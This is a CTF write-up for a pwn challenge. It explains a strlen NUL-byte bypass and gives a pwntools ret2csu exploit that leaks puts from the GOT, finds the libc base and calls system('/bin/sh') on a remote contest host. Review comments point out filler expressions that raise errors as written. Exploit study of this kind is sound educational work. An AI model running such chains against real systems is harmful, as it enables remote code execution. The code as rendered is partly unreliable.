Problem: [SWPUCTF 2025 秋季新生赛]__libc_csu_init()
思路
- strlen会被\x00截断,在buf里加入\x00即可,之后再填充8个字节,到达retn,之后就是正常ret2csu的做法,题目有rdi直接用即可
EXP
- from pwn import *
# Remote challenge instance plus the two ELF images every address below is taken from.
p=remote('node6.anna.nssctf.cn',26916)
a=ELF('./bug')
libc=ELF('./libc.so.6')
# Two entry points into __libc_csu_init used by csu() below. They are absolute
# 0x4008xx addresses, so the binary is presumably non-PIE (confirm with checksec).
csu1=0x400890
csu2=0x4008A6
# The gadget the write-up calls "rdi" (the prose says the challenge provides one);
# used in the final chain to set the first argument before returning into system.
rdi=0x00000000004008b3
# GOT slot handed to csu(); the leak is later interpreted as the address of puts,
# so presumably this is puts@got — confirm against the binary's relocation table.
got=0x601018
main=a.symbols['main']
def csu(r12,r15):
# Send one ret2csu chain that ends by returning into main, so a second payload
# can follow. The body lines carry no indentation here (rendering artefact), and
# whether the trailing sleep(1) belongs to the function or follows it cannot be
# told from this page.
#
# Why it works / what would stop it: the prose says input length is measured with
# strlen, so an embedded NUL makes the check see a short string while the rest of
# the buffer still lands on the stack. A bounded read that uses the actual number
# of bytes received (rather than strlen on attacker-controlled data) closes that
# gap; stack canaries or PIE would also break the fixed offsets this chain relies on.
#
# Prefix: 0x4f filler bytes, the NUL byte, then 8 bytes of padding up to the saved
# return address. NOTE(review): `b'a'(0x50-1)` and `b'a'(0x8)` call a bytes
# object and raise TypeError as written; the final payload further down spells the
# same filler as `b'a'*(0x8)`, so the `*` was presumably lost in rendering.
pd=b'a'(0x50-1)+b'\x00'+b'a'(0x8)+p64(csu2)
# Seven slots consumed by the csu2 gadget. In the conventional ret2csu layout the
# first is skipped by the gadget's stack adjust and the rest become rbx=0, rbp=1,
# r12, r13=0, r14=0, r15 — which slot reaches which register must be confirmed by
# disassembling 0x4008A6.
pd+=p64(0)
pd+=p64(0)
pd+=p64(1)
pd+=p64(r12)
pd+=p64(0)
pd+=p64(0)
pd+=p64(r15)
# Second gadget, then 0x38 bytes (seven slots) that it discards/pops before its
# own ret, then the return into main for the next round.
pd+=p64(csu1)
pd+=b'a'(0x38)
pd+=p64(main)
p.send(pd)
sleep(1)
# Round 1: leak. r12 and r15 are both the GOT slot, so the csu call goes through
# [r12] and — assuming the gadget moves r15d into edi, to be confirmed by
# disassembly — passes that slot's address as the first argument, i.e. puts on
# its own GOT entry, which prints the resolved libc address.
csu(got,got)
# Read up to the 0x7f byte (high byte of a typical x86-64 userland libc address),
# keep the last 6 bytes and zero-extend to 8 for u64. NOTE(review): the delimiter
# is a str while the stream is bytes; pwntools' handling of str delimiters differs
# by version — confirm it matches as intended.
add=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
# libc base from the leaked puts, then system and a "/bin/sh" string located in
# the same libc image.
base=add-libc.sym['puts']
system=base+libc.sym['system']
binsh=base+next(libc.search(b'/bin/sh\x00'))
# Round 2 (after the chain returned into main): same filler/NUL/padding prefix,
# then the rdi gadget loads the "/bin/sh" pointer and control returns into system.
# NOTE(review): the first filler is written `b'a'(0x50-1)` (a call on a bytes
# object, TypeError as written) while the second is `b'a'*(0x8)` — the two
# spellings are inconsistent.
payload=b'a'(0x50-1)+b'\x00'+b'a'*(0x8)+p64(rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()
总结